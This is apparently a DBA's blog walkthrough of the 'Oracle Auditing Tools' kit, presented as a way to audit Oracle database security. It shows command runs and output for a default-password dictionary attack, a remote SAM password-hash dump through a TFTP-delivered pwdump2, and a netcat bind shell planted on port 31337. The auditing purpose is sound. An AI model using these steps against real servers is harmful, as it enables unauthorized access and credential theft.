“ Oracle Auditing Tools”for Oracle

This is guide for an open source utility "Oracle Auditing Tools", which offers password
guessing, query tool, listener check and more.

The toolkit consists of the following tools:  OraclePWGuess (opwg.bat) - A dictionary attack tool that can be used with usersupplied dictionaries or with the builtin support for finding default accounts.  OracleQuery (oquery.bat) - A minimalistic command line based sql query tool.  OracleSamDump (osd.bat) - Connects to the Oracle server and executes TFTP get, to fetch the pwdump2 binary. The server is then pwdump2:ed and the result is returned to the SAM folder of the TFTP server.  OracleSysExec - Can be run in interactive mode, letting the user specify commands to be executed by the server or in automatic mode. In automatic mode, netcat is tftpd over to the server and binds a shell to the tcp port 31337.  OracleTNSCtrl - is used to query the TNS listener for various information, like the Oracle lsnrctl utility. It is somewhat limited though. Use the help command to see commands curently implemented. To run this tool, we need:
 

Java Runtime Environment or Jave Developer Kit Oracle JDBC Driver (classes111.zip or classes12.zip

Before testing, we add the following entries to PATH and CLASSPATH:
 

Add C:\Program Files\Java\jdk1.5.0_11\bin to PATH Edit .bat file as following

opwg.bat @echo off rem rem OracleSamDump by Patrik Karlsson set CP=.;C:/Jonathan/OracleServer/jdbc/lib/classes12.jar;ork.jar rem @set CP=.;classes12.zip;ork.jar java -classpath %CP% ork.OraclePwGuess %* We run opwg.bat:

C:\downloads\Oracle Tools\oat-binary-1.3.1\oat>opwg.bat -s hostserver Oracle Password Guesser v1.3.1 by patrik@cqure.net -------------------------------------------------INFO: Running pwcheck on SID DB1 INFO: Running pwcheck on SID DB2 Successfully logged in with OLAPSYS/MANAGER INFO: Running pwcheck on SID DB3 Skipping PLSExtProc ... INFO: Running pwcheck on SID DB4 Successfully logged in with DBSNMP/DBSNMP INFO: Running pwcheck on SID DB5 Successfully logged in with OWA_PUBLIC/OWA_PUBLIC Successfully logged in with PORTAL30_DEMO/PORTAL30_DEMO Successfully logged in with PORTAL30_PUBLIC/PORTAL30_PUBLIC Successfully logged in with PORTAL30_SSO_PS/PORTAL30_SSO_PS Successfully logged in with PORTAL30_SSO_PUBLIC/PORTAL30_SSO_PUBLIC Successfully logged in with TRACESVR/TRACE  That's very good. We now know what oracle account still use default password. We run oquery.bat: C:\downloads\Oracle Tools\oat-binary-1.3.1\oat>oquery.bat -s hostserver -d DB1 -u system -p xxxxxx -q "select table_name,table_type from cat" OracleQuery v1.3.1 by patrik@cqure.net ---------------------------------------TABLE_NAME | TABLE_TYPE AQ$DEF$_AQCALL | VIEW AQ$DEF$_AQERROR | VIEW AQ$_INTERNET_AGENTS | TABLE AQ$_INTERNET_AGENT_PRIVS | TABLE AQ$_QUEUES | TABLE AQ$_QUEUE_TABLES | TABLE AQ$_SCHEDULES | TABLE CATALOG | SYNONYM COL | SYNONYM DEF$_AQCALL | TABLE DEF$_AQERROR | TABLE DEF$_CALLDEST | TABLE DEF$_DEFAULTDEST | TABLE DEF$_DESTINATION | TABLE DEF$_ERROR | TABLE DEF$_LOB | TABLE DEF$_ORIGIN | TABLE

A practical SQL query utility.

We run osd.bat: C:\downloads\Oracle Tools\oat-binary-1.3.1\oat>osd.bat -s gold -u system -p cerial -d test Oracle Sam Dump v1.3.1 by patrik@cqure.net -----------------------------------------INFO: Local IP seems to be 140.xxx.x.xxx SERVER:[2] Tftp Server thread started. INFO: Uploading PWDUMP2 to Oracle Server INFO: Dumping the SAM on Oracle Server INFO: Fetching sam.txt INFO: If all went well, the server SAM file should be in tftproot/sam INFO: Cleaning up ! INFO: Stopping TFTP Server

Good utility to do password checking by extending pdwump2 to UNIX via TFTP

Note:PWDUMP2 is an application which dumps the password hashes (OWFs) from NT's SAM database, whether or not SYSKEY is enabled on the system. Note: Abbreviation of Trivial File Transfer Protocol, a simple form of the File Transfer
Protocol (FTP). TFTP uses the User Datagram Protocol (UDP)and provides no security features. It is often used by servers to boot diskless workstations, X-terminals, and routers.

We run otnsctl.bat: C:\downloads\Oracle Tools\oat-binary-1.3.1\oat>otnsctl.bat -s hostserver -I Oracle TNS Control v1.3.1 by patrik@cqure.net --------------------------------------------tnscmd> help help set password - sets the password with which to connect to the listener services - shows services status - shows status version - returns version information tnscmd> version TNSLSNR for Solaris: Version - Production TNS for Solaris: Version - Production Unix Domain Socket IPC NT Protocol Adaptor for Solaris: Version Production

Oracle Bequeath NT Protocol Adapter for Solaris: Version - Production TCP/IP NT Protocol Adapter for Solaris: Version - Production  can be used to secure Oracle listener. We run ose.bat: C:\downloads\Oracle Tools\oat-binary-1.3.1\oat>ose -s hostserver -u system -p xxxxxx -d test -t Solaris OracleSysExec v1.3.1 by patrik@cqure.net ---------------------------------------INFO: Local IP seems to be 140.xxx.x.xxx SERVER:[2] Tftp Server thread started. Adding haxxor stuff for Solaris ... INFO: Uploading netcat to Oracle Server INFO: Sleeping for 2 seconds INFO: Creating shell on port 31337 INFO: Cleaning up ! INFO: Don't forget to remove netcat when finnished ! INFO: Stopping TFTP Server Note: Visit here for more on netcat. Overall, "Oracle Auditing Tool" is a practical and feasible tool for DBA to monitoring database security issues. Among "Oracle Auditing Tool", the most impressive one is OraclePWGuess (opwg.bat). I ever used the utility offered in "Oracle Metalink Patch 4926128" to check the default oracle account. For a milti-instance environment, we need to log on each instance respectively to run the provided SQL script. With OraclePWGuess (opwg.bat), the only thing we need to is identifying name of host server. Then, the utility will automatically go through every instance on that server. That's fantastic.

Written by R.Wang Blog: http://www.oraclepoint.com/oralife More Resource: http://www.oraclepoint.com

Sign up to vote on this title
UsefulNot useful